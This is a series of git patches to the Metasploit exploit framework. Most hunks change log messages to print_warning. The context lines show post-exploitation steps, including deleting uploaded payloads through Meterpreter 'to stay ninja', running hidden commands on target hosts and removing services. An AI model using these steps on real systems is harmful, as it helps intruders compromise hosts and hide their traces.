b/modules/exploits/multi/http/jboss_bshdeployer.rb index 756545bb9b..54a8b89c64 100644 --- a/modules/exploits/multi/http/jboss_bshdeployer.rb +++ b/modules/exploits/multi/http/jboss_bshdeployer.rb @@ -222,10 +222,10 @@ EOT print_status("Undeploying #{uri} by deleting the WAR file via BSHDeployer...") res = invoke_bshscript(delete_script, @pkg) if !res - print_error("WARNING: Unable to remove WAR [No Response]") + print_warning("WARNING: Unable to remove WAR [No Response]") end if (res.code < 200 || res.code >= 300) - print_error("WARNING: Unable to remove WAR [#{res.code} #{res.message}]") + print_warning("WARNING: Unable to remove WAR [#{res.code} #{res.message}]") end handler @@ -307,7 +307,7 @@ EOT if (res.code < 200 || res.code >= 300) case res.code when 401 - print_error("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}") + print_warning("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}") fail_with(Exploit::Failure::NoAccess, "Authentication requested: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}") end diff --git a/modules/exploits/multi/http/jboss_deploymentfilerepository.rb b/modules/exploits/multi/http/jboss_deploymentfilerepository.rb index 5b961d55ad..09da6021f2 100644 --- a/modules/exploits/multi/http/jboss_deploymentfilerepository.rb +++ b/modules/exploits/multi/http/jboss_deploymentfilerepository.rb @@ -248,9 +248,9 @@ EOT delete_res << delete_file('./', Rex::Text.uri_encode(app_base) + '.war', '') delete_res.each do |res| if !res - print_error("WARNING: Unable to remove WAR [No Response]") + print_warning("WARNING: Unable to remove WAR [No Response]") elsif (res.code < 200 || res.code >= 300) - print_error("WARNING: Unable to remove WAR [#{res.code} #{res.message}]") + print_warning("WARNING: Unable to remove WAR [#{res.code} #{res.message}]") end end diff --git a/modules/exploits/multi/http/jboss_maindeployer.rb b/modules/exploits/multi/http/jboss_maindeployer.rb index be7cb66e1c..da2cc34909 100644 --- a/modules/exploits/multi/http/jboss_maindeployer.rb +++ b/modules/exploits/multi/http/jboss_maindeployer.rb @@ -211,7 +211,7 @@ class Metasploit3 < Msf::Exploit::Remote if (res.code < 200 or res.code >= 300) case res.code when 401 - print_error("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}") + print_warning("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}") end fail_with(Exploit::Failure::Unknown, "Upload to deploy WAR archive [#{res.code} #{res.message}]") end @@ -291,12 +291,12 @@ class Metasploit3 < Msf::Exploit::Remote } }, 30) if (! res) - print_error("WARNING: Undeployment failed on #{app_base} [No Response]") + print_warning("WARNING: Undeployment failed on #{app_base} [No Response]") elsif (res.code == 500 and datastore['VERB'] == 'POST') # POST requests result in a http 500 error, but the payload is removed..." - print_status("WARNING: Undeployment might have failed (unlikely)") + print_warning("WARNING: Undeployment might have failed (unlikely)") elsif (res.code < 200 or res.code >= 300) - print_error("WARNING: Undeployment failed on #{app_base} [#{res.code} #{res.message}]") + print_warning("WARNING: Undeployment failed on #{app_base} [#{res.code} #{res.message}]") end handler diff --git a/modules/exploits/multi/http/openfire_auth_bypass.rb b/modules/exploits/multi/http/openfire_auth_bypass.rb index 53b143be56..d1f8ad56b1 100644 --- a/modules/exploits/multi/http/openfire_auth_bypass.rb +++ b/modules/exploits/multi/http/openfire_auth_bypass.rb @@ -195,7 +195,7 @@ class Metasploit3 < Msf::Exploit::Remote }) - print_error("Warning: got no response from the upload, continuing...") if !res + print_warning("Warning: got no response from the upload, continuing...") if !res # Delete the uploaded JAR file if datastore['REMOVE_PLUGIN'] diff --git a/modules/exploits/multi/http/tomcat_mgr_deploy.rb b/modules/exploits/multi/http/tomcat_mgr_deploy.rb index 0b5ccdebbf..1632d1aea5 100644 --- a/modules/exploits/multi/http/tomcat_mgr_deploy.rb +++ b/modules/exploits/multi/http/tomcat_mgr_deploy.rb @@ -217,7 +217,7 @@ class Metasploit3 < Msf::Exploit::Remote if (res.code < 200 or res.code >= 300) case res.code when 401 - print_error("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}") + print_warning("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}") end fail_with(Exploit::Failure::Unknown, "Upload failed on #{path_tmp} [#{res.code} #{res.message}]") end @@ -259,9 +259,9 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => 'GET' }, 20) if (! res) - print_error("WARNING: Undeployment failed on #{path} [No Response]") + print_warning("WARNING: Undeployment failed on #{path} [No Response]") elsif (res.code < 200 or res.code >= 300) - print_error("Deletion failed on #{path} [#{res.code} #{res.message}]") + print_warning("Deletion failed on #{path} [#{res.code} #{res.message}]") end handler diff --git a/modules/exploits/solaris/sunrpc/ypupdated_exec.rb b/modules/exploits/solaris/sunrpc/ypupdated_exec.rb index 3fbcc4f888..b72909e874 100644 --- a/modules/exploits/solaris/sunrpc/ypupdated_exec.rb +++ b/modules/exploits/solaris/sunrpc/ypupdated_exec.rb @@ -85,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status('No Errors, appears to have succeeded!') rescue ::Rex::Proto::SunRPC::RPCTimeout - print_error('Warning: ' + $!) + print_warning('Warning: ' + $!) end end diff --git a/modules/exploits/unix/webapp/openx_banner_edit.rb b/modules/exploits/unix/webapp/openx_banner_edit.rb index 7b4554ba48..445a8fcbe6 100644 --- a/modules/exploits/unix/webapp/openx_banner_edit.rb +++ b/modules/exploits/unix/webapp/openx_banner_edit.rb @@ -157,9 +157,9 @@ class Metasploit3 < Msf::Exploit::Remote # Delete the banner :) if (not openx_banner_delete(uri_base, cookie, adv_id, camp_id, ban_id)) - print_error("WARNING: Unable to automatically delete the banner :-/") + print_warning("WARNING: Unable to automatically delete the banner :-/") else - print_status("Successfully deleted banner # #{ban_id}") + print_good("Successfully deleted banner # #{ban_id}") end print_status("You should have a session now.") diff --git a/modules/exploits/unix/webapp/twiki_history.rb b/modules/exploits/unix/webapp/twiki_history.rb index 60992ffeb8..6f57d9c253 100644 --- a/modules/exploits/unix/webapp/twiki_history.rb +++ b/modules/exploits/unix/webapp/twiki_history.rb @@ -74,7 +74,7 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => test_url }, 25) if (not res) or (res.code != 404) - print_error("WARNING: The test file exists already!") + print_warning("WARNING: The test file exists already!") return Exploit::CheckCode::Safe end @@ -103,7 +103,7 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => cmd_base + Rex::Text.uri_encode(rev) }, 25) if (not res) or (res.code != 200) - print_error("WARNING: unable to remove test file (#{test_file})") + print_warning("WARNING: unable to remove test file (#{test_file})") end return Exploit::CheckCode::Vulnerable diff --git a/modules/exploits/unix/webapp/twiki_search.rb b/modules/exploits/unix/webapp/twiki_search.rb index 8d53310d6c..076195f93b 100644 --- a/modules/exploits/unix/webapp/twiki_search.rb +++ b/modules/exploits/unix/webapp/twiki_search.rb @@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => test_url }, 25) if (not res) or (res.body.match(content)) - print_error("WARNING: The test file exists already!") + print_warning("WARNING: The test file exists already!") return Exploit::CheckCode::Safe end @@ -98,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => cmd_base + Rex::Text.uri_encode(search) }, 25) if (not res) or (res.code != 200) - print_error("WARNING: unable to remove test file (#{test_file})") + print_warning("WARNING: unable to remove test file (#{test_file})") end return Exploit::CheckCode::Vulnerable diff --git a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb index 97b17790ef..a9fecc52a8 100644 --- a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb +++ b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb @@ -154,7 +154,7 @@ class Metasploit3 < Msf::Exploit::Remote lines = [] launch_message.gsub(/.{1,80}(?:\s|\Z)/) { lines << $& } if (lines.length > 2) - print_status("Warning: the LAUNCH_MESSAGE is more than 2 lines. It may not display correctly.") + print_warning("Warning: the LAUNCH_MESSAGE is more than 2 lines. It may not display correctly.") end output << "&"+ diff --git a/modules/exploits/windows/iis/iis_webdav_upload_asp.rb b/modules/exploits/windows/iis/iis_webdav_upload_asp.rb index c04418b1e8..187f81b3a0 100644 --- a/modules/exploits/windows/iis/iis_webdav_upload_asp.rb +++ b/modules/exploits/windows/iis/iis_webdav_upload_asp.rb @@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote print_error("Upload failed on #{path_tmp} [#{res.code} #{res.message}]") case res.code when 401 - print_status("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}") + print_warning("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}") end return end @@ -101,9 +101,9 @@ class Metasploit3 < Msf::Exploit::Remote print_error("Move failed on #{path_tmp} [#{res.code} #{res.message}]") case res.code when 401 - print_status("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}") + print_warning("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}") when 403 - print_status("Warning: The web site may not allow 'Script Source Access', which is required to upload executable content.") + print_warning("Warning: The web site may not allow 'Script Source Access', which is required to upload executable content.") end return end diff --git a/modules/exploits/windows/local/current_user_psexec.rb b/modules/exploits/windows/local/current_user_psexec.rb index bf9f7c0218..c797df5e28 100644 --- a/modules/exploits/windows/local/current_user_psexec.rb +++ b/modules/exploits/windows/local/current_user_psexec.rb @@ -120,8 +120,8 @@ class Metasploit3 < Msf::Exploit::Local service_delete(name, server) rescue print_error("Exception running payload: #{$!.class} : #{$!}") - print_error("#{server.ljust(16)} WARNING: May have failed to clean up!") - print_error("#{server.ljust(16)} Try a command like: sc \\\\#{server}\\ delete #{name}") + print_warning("#{server.ljust(16)} WARNING: May have failed to clean up!") + print_warning("#{server.ljust(16)} Try a command like: sc \\\\#{server}\\ delete #{name}") next end end diff --git a/modules/exploits/windows/ssl/ms04_011_pct.rb b/modules/exploits/windows/ssl/ms04_011_pct.rb index e344cf7ca1..0de658d54a 100644 --- a/modules/exploits/windows/ssl/ms04_011_pct.rb +++ b/modules/exploits/windows/ssl/ms04_011_pct.rb @@ -148,7 +148,7 @@ class Metasploit3 < Msf::Exploit::Remote resp = sock.get_once if (resp and resp !~ /^220/) - print_status("Warning: this server may not support STARTTLS") + print_warning("Warning: this server may not support STARTTLS") end end diff --git a/modules/exploits/windows/wins/ms04_045_wins.rb b/modules/exploits/windows/wins/ms04_045_wins.rb index 29a69e3ecc..b8c362841f 100644 --- a/modules/exploits/windows/wins/ms04_045_wins.rb +++ b/modules/exploits/windows/wins/ms04_045_wins.rb @@ -101,7 +101,7 @@ class Metasploit3 < Msf::Exploit::Remote # this system, or something major happened to the heap that will probably # prevent this exploit from working. if (not ret[3]) - print_status("Warning: the leaked heap address indicates that this attack may fail"); + print_warning("Warning: the leaked heap address indicates that this attack may fail"); end # The base address of our structure in memory From 799c22554ecaa2d064dc31343991e79278a30d59 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Wed, 24 Oct 2012 00:54:17 -0500 Subject: [PATCH 47/74] Warn user if a file/permission is being modified during new session --- .../linux/http/symantec_web_gateway_file_upload.rb | 1 + modules/exploits/linux/http/webid_converter.rb | 2 +- modules/exploits/multi/http/qdpm_upload_exec.rb | 2 +- modules/exploits/multi/http/struts_code_exec.rb | 2 +- .../multi/http/struts_code_exec_exception_delegator.rb | 2 +- modules/exploits/multi/http/testlink_upload_exec.rb | 1 + modules/exploits/multi/http/webpagetest_upload_exec.rb | 10 ++++++++-- .../exploits/unix/webapp/sugarcrm_unserialize_exec.rb | 1 + .../exploits/unix/webapp/tikiwiki_unserialize_exec.rb | 1 + modules/exploits/unix/webapp/xoda_file_upload.rb | 1 + .../browser/hp_easy_printer_care_xmlcachemgr.rb | 4 ++-- .../browser/hp_easy_printer_care_xmlsimpleaccessor.rb | 4 ++-- .../windows/browser/zenworks_helplauncher_exec.rb | 2 +- .../windows/http/avaya_ccr_imageupload_exec.rb | 1 + modules/exploits/windows/http/cyclope_ess_sqli.rb | 4 ++-- .../exploits/windows/http/oracle_btm_writetofile.rb | 4 ++-- .../windows/http/solarwinds_storage_manager_sql.rb | 4 ++-- modules/exploits/windows/http/umbraco_upload_aspx.rb | 4 ++-- modules/exploits/windows/iis/ms01_026_dbldecode.rb | 2 +- modules/exploits/windows/iis/msadc.rb | 4 ++-- .../exploits/windows/mysql/scrutinizer_upload_exec.rb | 4 ++-- 21 files changed, 36 insertions(+), 24 deletions(-) diff --git a/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb b/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb index b40764efa4..0fd2c46f7b 100644 --- a/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb +++ b/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb @@ -70,6 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote end def on_new_session(client) + print_warning("Deleting temp.php") if client.type == "meterpreter" client.core.use("stdapi") if not client.ext.aliases.include?("stdapi") client.fs.file.rm("temp.php") diff --git a/modules/exploits/linux/http/webid_converter.rb b/modules/exploits/linux/http/webid_converter.rb index 5f0eae911d..75ed6e68cd 100644 --- a/modules/exploits/linux/http/webid_converter.rb +++ b/modules/exploits/linux/http/webid_converter.rb @@ -109,7 +109,7 @@ class Metasploit3 < Msf::Exploit::Remote res = client.fs.file.search(nil, "currencies.php", true, -1) res.each do |hit| filename = "#{hit['path']}/#{hit['name']}" - print_status("#{peer} - Restoring #{filename}") + print_warning("#{peer} - Restoring #{filename}") client.fs.file.rm(filename) fd = client.fs.file.new(filename, "wb") fd.write(currencies_php) diff --git a/modules/exploits/multi/http/qdpm_upload_exec.rb b/modules/exploits/multi/http/qdpm_upload_exec.rb index 4329ff1fa8..5ff6529e6a 100644 --- a/modules/exploits/multi/http/qdpm_upload_exec.rb +++ b/modules/exploits/multi/http/qdpm_upload_exec.rb @@ -94,7 +94,7 @@ class Metasploit3 < Msf::Exploit::Remote end @clean_files.each do |f| - print_status("#{@peer} - Removing: #{f}") + print_warning("#{@peer} - Removing: #{f}") begin if cli.type == 'meterpreter' cli.fs.file.rm(f) diff --git a/modules/exploits/multi/http/struts_code_exec.rb b/modules/exploits/multi/http/struts_code_exec.rb index 85ef707b47..554a968c4e 100644 --- a/modules/exploits/multi/http/struts_code_exec.rb +++ b/modules/exploits/multi/http/struts_code_exec.rb @@ -130,7 +130,7 @@ class Metasploit3 < Msf::Exploit::Remote def on_new_session(client) if target['Platform'] == 'linux' - print_status("Deleting #{@payload_exe} payload file") + print_warning("Deleting #{@payload_exe} payload file") execute_command("/bin/sh@-c@rm #{@payload_exe}") else print_status("Windows does not allow running executables to be deleted") diff --git a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb index e33e0fa926..277b65efa4 100644 --- a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb +++ b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb @@ -182,7 +182,7 @@ class Metasploit3 < Msf::Exploit::Remote return end - print_status("Deleting the #{@payload_exe} file") + print_warning("Deleting the #{@payload_exe} file") client.fs.file.rm(@payload_exe) end diff --git a/modules/exploits/multi/http/testlink_upload_exec.rb b/modules/exploits/multi/http/testlink_upload_exec.rb index 7b9d70aa12..bfd37ec027 100644 --- a/modules/exploits/multi/http/testlink_upload_exec.rb +++ b/modules/exploits/multi/http/testlink_upload_exec.rb @@ -140,6 +140,7 @@ class Metasploit3 < Msf::Exploit::Remote end def on_new_session(client) + print_warning("Deleting #{@token}.php") if client.type == "meterpreter" client.core.use("stdapi") if not client.ext.aliases.include?("stdapi") client.fs.file.rm("#{@token}.php") diff --git a/modules/exploits/multi/http/webpagetest_upload_exec.rb b/modules/exploits/multi/http/webpagetest_upload_exec.rb index dc66fe059b..bf342c1632 100644 --- a/modules/exploits/multi/http/webpagetest_upload_exec.rb +++ b/modules/exploits/multi/http/webpagetest_upload_exec.rb @@ -80,8 +80,14 @@ class Metasploit3 < Msf::Exploit::Remote return end cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi") - cli.fs.file.rm(@target_path) - print_status("#{@target_path} removed") + + begin + print_warning("Deleting: #{@target_path}") + cli.fs.file.rm(@target_path) + print_good("#{@target_path} removed") + rescue + print_error("Unable to delete: #{@target_path}") + end end diff --git a/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb b/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb index c2b8fd32bb..5362ed117f 100644 --- a/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb @@ -65,6 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote f = "pathCache.php" client.core.use("stdapi") if not client.ext.aliases.include?("stdapi") begin + print_warning("#{@peer} - Deleting #{f}") client.fs.file.rm(f) print_good("#{@peer} - #{f} removed to stay ninja") rescue diff --git a/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb b/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb index a519dfbc8d..c013b2ca94 100644 --- a/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb @@ -69,6 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote if client.type == "meterpreter" client.core.use("stdapi") if not client.ext.aliases.include?("stdapi") begin + print_warning("#{@peer} - Deleting #{@upload_php}") client.fs.file.rm(@upload_php) print_good("#{@peer} - #{@upload_php} removed to stay ninja") rescue diff --git a/modules/exploits/unix/webapp/xoda_file_upload.rb b/modules/exploits/unix/webapp/xoda_file_upload.rb index 91a0c1cbf6..4c36cafbb4 100644 --- a/modules/exploits/unix/webapp/xoda_file_upload.rb +++ b/modules/exploits/unix/webapp/xoda_file_upload.rb @@ -74,6 +74,7 @@ class Metasploit3 < Msf::Exploit::Remote end def on_new_session(client) + print_warning("Deleting #{@payload_name}") if client.type == "meterpreter" client.core.use("stdapi") if not client.ext.aliases.include?("stdapi") client.fs.file.rm(@payload_name) diff --git a/modules/exploits/windows/browser/hp_easy_printer_care_xmlcachemgr.rb b/modules/exploits/windows/browser/hp_easy_printer_care_xmlcachemgr.rb index 5af4787468..c512f2ff8b 100644 --- a/modules/exploits/windows/browser/hp_easy_printer_care_xmlcachemgr.rb +++ b/modules/exploits/windows/browser/hp_easy_printer_care_xmlcachemgr.rb @@ -83,9 +83,9 @@ class Metasploit3 < Msf::Exploit::Remote client.sys.process.execute(cmd, nil, {'Hidden' => true }) begin - print_status("Deleting the vbs payload \"#{@var_vbs_name}.vbs\" ...") + print_warning("Deleting the vbs payload \"#{@var_vbs_name}.vbs\" ...") client.fs.file.rm("C:\\windows\\system32\\" + @var_vbs_name + ".vbs") - print_status("Deleting the mof file \"#{@var_mof_name}.mof\" ...") + print_warning("Deleting the mof file \"#{@var_mof_name}.mof\" ...") client.fs.file.rm("C:\\windows\\system32\\wbem\\mof\\good\\" + @var_mof_name + ".mof") rescue ::Exception => e print_error("Exception: #{e.inspect}") diff --git a/modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb b/modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb index 0c10e27e8b..11b118f7e9 100644 --- a/modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb +++ b/modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb @@ -88,9 +88,9 @@ class Metasploit3 < Msf::Exploit::Remote client.sys.process.execute(cmd, nil, {'Hidden' => true }) begin - print_status("Deleting the vbs payload \"#{@var_vbs_name}.vbs\" ...") + print_warning("Deleting the vbs payload \"#{@var_vbs_name}.vbs\" ...") client.fs.file.rm("C:\\windows\\system32\\" + @var_vbs_name + ".vbs") - print_status("Deleting the mof file \"#{@var_mof_name}.mof\" ...") + print_warning("Deleting the mof file \"#{@var_mof_name}.mof\" ...") client.fs.file.rm("C:\\windows\\system32\\wbem\\mof\\good\\" + @var_mof_name + ".mof") rescue ::Exception => e print_error("Exception: #{e.inspect}") diff --git a/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb b/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb index ab797d84b9..fa50d338f2 100644 --- a/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb +++ b/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb @@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote client.core.use("stdapi") if not client.ext.aliases.include?("stdapi") begin - print_status("Deleting the vbs payload \"#{@stager_name}\" ...") + print_warning("Deleting the vbs payload \"#{@stager_name}\" ...") client.fs.file.rm("#{@temp_folder}/#{@stager_name}") print_good("The vbs stager has been deleted successfully") print_status("The exe payload #{@temp_folder}/#{@payload_name}.exe must be removed manually") diff --git a/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb b/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb index dda10a4f03..5ce40072bf 100644 --- a/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb +++ b/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb @@ -65,6 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi") begin + print_warning("#{@peer} - Removing #{@payload_path}") cli.fs.file.rm(@payload_path) print_good("#{@peer} - #{@payload_path} deleted") rescue ::Exception => e diff --git a/modules/exploits/windows/http/cyclope_ess_sqli.rb b/modules/exploits/windows/http/cyclope_ess_sqli.rb index de6b59784b..b16a87177e 100644 --- a/modules/exploits/windows/http/cyclope_ess_sqli.rb +++ b/modules/exploits/windows/http/cyclope_ess_sqli.rb @@ -96,14 +96,14 @@ class Metasploit3 < Msf::Exploit::Remote cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi") begin - print_status("Deleting #{@php_fname}") + print_warning("Deleting #{@php_fname}") cli.fs.file.rm(@php_fname) rescue ::Exception => e print_error("Please note: #{@php_fname} is stil on disk.") end begin - print_status("Deleting #{@exe_fname}") + print_warning("Deleting #{@exe_fname}") cli.fs.file.rm(@exe_fname) rescue ::Exception => e print_error("Please note: #{@exe_fname} is still on disk.") diff --git a/modules/exploits/windows/http/oracle_btm_writetofile.rb b/modules/exploits/windows/http/oracle_btm_writetofile.rb index 2252ccc0be..9c624a2d21 100644 --- a/modules/exploits/windows/http/oracle_btm_writetofile.rb +++ b/modules/exploits/windows/http/oracle_btm_writetofile.rb @@ -102,9 +102,9 @@ class Metasploit3 < Msf::Exploit::Remote client.sys.process.execute(cmd, nil, {'Hidden' => true }) begin - print_status("Deleting the vbs payload \"#{@var_vbs_name}.vbs\" ...") + print_warning("Deleting the vbs payload \"#{@var_vbs_name}.vbs\" ...") client.fs.file.rm("C:\\windows\\system32\\" + @var_vbs_name + ".vbs") - print_status("Deleting the mof file \"#{@var_mof_name}.mof\" ...") + print_warning("Deleting the mof file \"#{@var_mof_name}.mof\" ...") client.fs.file.rm("C:\\windows\\system32\\wbem\\mof\\good\\" + @var_mof_name + ".mof") rescue ::Exception => e print_error("Exception: #{e.inspect}") diff --git a/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb b/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb index a2e2c5826f..21ba5df8c4 100644 --- a/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb +++ b/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb @@ -95,9 +95,9 @@ class Metasploit3 < Msf::Exploit::Remote begin jsp = @outpath.gsub(/\//, "\\\\") jsp = jsp.gsub(/"/, "") - vprint_status("#{rhost}:#{rport} - Deleting: #{jsp}") + print_warning("#{rhost}:#{rport} - Deleting: #{jsp}") cli.fs.file.rm(jsp) - print_status("#{rhost}:#{rport} - #{@jsp_name + '.jsp'} deleted") + print_good("#{rhost}:#{rport} - #{@jsp_name + '.jsp'} deleted") rescue ::Exception => e print_error("Unable to delete #{@jsp_name + '.jsp'}: #{e.message}") end diff --git a/modules/exploits/windows/http/umbraco_upload_aspx.rb b/modules/exploits/windows/http/umbraco_upload_aspx.rb index 23b805ebe9..c53b1ff930 100644 --- a/modules/exploits/windows/http/umbraco_upload_aspx.rb +++ b/modules/exploits/windows/http/umbraco_upload_aspx.rb @@ -79,10 +79,10 @@ class Metasploit3 < Msf::Exploit::Remote end files.each { |f| - print_status("#{@peer} - Deleting: #{f['path'] + "\\" + f['name']}") + print_warning("#{@peer} - Deleting: #{f['path'] + "\\" + f['name']}") cli.fs.file.rm(f['path'] + "\\" + f['name']) } - print_status("#{@peer} - #{aspx} deleted") + print_good("#{@peer} - #{aspx} deleted") rescue ::Exception => e print_error("Unable to delete #{aspx}: #{e.message}") end diff --git a/modules/exploits/windows/iis/ms01_026_dbldecode.rb b/modules/exploits/windows/iis/ms01_026_dbldecode.rb index a700b41e53..6ddbbd0ed6 100644 --- a/modules/exploits/windows/iis/ms01_026_dbldecode.rb +++ b/modules/exploits/windows/iis/ms01_026_dbldecode.rb @@ -245,7 +245,7 @@ class Metasploit3 < Msf::Exploit::Remote cmd = "C:\\#{@win_dir}\\system32\\attrib.exe -r -h -s " + delete_me_too client.sys.process.execute(cmd, nil, {'Hidden' => true }) - print_status("Deleting #{delete_me_too} ...") + print_warning("Deleting #{delete_me_too} ...") begin client.fs.file.rm(delete_me_too) rescue ::Exception => e diff --git a/modules/exploits/windows/iis/msadc.rb b/modules/exploits/windows/iis/msadc.rb index 5f5c6ab8c1..db3b562843 100644 --- a/modules/exploits/windows/iis/msadc.rb +++ b/modules/exploits/windows/iis/msadc.rb @@ -373,11 +373,11 @@ class Metasploit3 < Msf::Exploit::Remote delete_me_too = "C:\\inetpub\\scripts\\" + @exe_payload # C:\ ? - print_status("Changing permissions on #{delete_me_too} ...") + print_warning("Changing permissions on #{delete_me_too} ...") cmd = "C:\\#{sysdir[0]}\\system32\\attrib.exe -r -h -s " + delete_me_too # winnt ? client.sys.process.execute(cmd, nil, {'Hidden' => true }) - print_status("Deleting #{delete_me_too} ...") + print_warning("Deleting #{delete_me_too} ...") begin client.fs.file.rm(delete_me_too) rescue ::Exception => e diff --git a/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb b/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb index f4ca7701f1..d4d04208a1 100644 --- a/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb +++ b/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb @@ -146,14 +146,14 @@ class Metasploit3 < Msf::Exploit::Remote cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi") begin - print_status("Deleting #{@php_fname}") + print_warning("Deleting #{@php_fname}") cli.fs.file.rm(@php_fname) rescue ::Exception => e print_error("Please note: #{@php_fname} is stil on disk.") end begin - print_status("Deleting #{@exe_fname}") + print_warning("Deleting #{@exe_fname}") cli.fs.file.rm(@exe_fname) rescue ::Exception => e print_error("Please note: #{@exe_fname} is still on disk.") From ede5d0f46b8385ce9a32bfc475c3d29f9e2d2aa2 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Wed, 24 Oct 2012 00:55:54 -0500 Subject: [PATCH 48/74] This is meant to be a warning, so we use print_warning --- modules/exploits/windows/browser/adobe_flash_otf_font.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/browser/adobe_flash_otf_font.rb b/modules/exploits/windows/browser/adobe_flash_otf_font.rb index 306001bafc..85bebd9785 100644 --- a/modules/exploits/windows/browser/adobe_flash_otf_font.rb +++ b/modules/exploits/windows/browser/adobe_flash_otf_font.rb @@ -221,7 +221,7 @@ class Metasploit3 < Msf::Exploit::Remote datastore['URIPATH'] = datastore['URIPATH'] || random_uri datastore['URIPATH'] = '/' + datastore['URIPATH'] if datastore['URIPATH'] !~ /^\// datastore['URIPATH'] = datastore['URIPATH'][0,3] if datastore['URIPATH'].length > 3 - print_debug("URIPATH set to #{datastore['URIPATH']}") + print_warning("URIPATH set to #{datastore['URIPATH']}") super end From 6d5da1662be2ba6c3004bbf9819a0da21665d980 Mon Sep 17 00:00:00 2001 From: 0a2940 <0a2940@gmail.com> Date: Wed, 24 Oct 2012 10:55:48 +0200 Subject: [PATCH 49/74] Update modules/post/multi/escalate/metasploit_pcaplog.rb Stance is now passive --- modules/post/multi/escalate/metasploit_pcaplog.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb index 52feb3c0b1..3d06100110 100644 --- a/modules/post/multi/escalate/metasploit_pcaplog.rb +++ b/modules/post/multi/escalate/metasploit_pcaplog.rb @@ -56,6 +56,7 @@ class Metasploit3 < Msf::Post [ [ 'Linux/Unix Universal', {} ], ], + 'Stance' => Msf::Exploit::Stance::Passive, 'DefaultTarget' => 0, } )) From 32ddd981ebade16bb8e23b3e4a9763c23b9086d3 Mon Sep 17 00:00:00 2001 From: 0a2940 <0a2940@gmail.com> Date: Wed, 24 Oct 2012 10:58:09 +0200 Subject: [PATCH 50/74] linux_kernel mixin not required --- modules/post/multi/escalate/metasploit_pcaplog.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb index 3d06100110..8502b2e075 100644 --- a/modules/post/multi/escalate/metasploit_pcaplog.rb +++ b/modules/post/multi/escalate/metasploit_pcaplog.rb @@ -10,7 +10,6 @@ require 'rex' require 'msf/core/post/common' require 'msf/core/post/file' require 'msf/core/post/linux/priv' -require 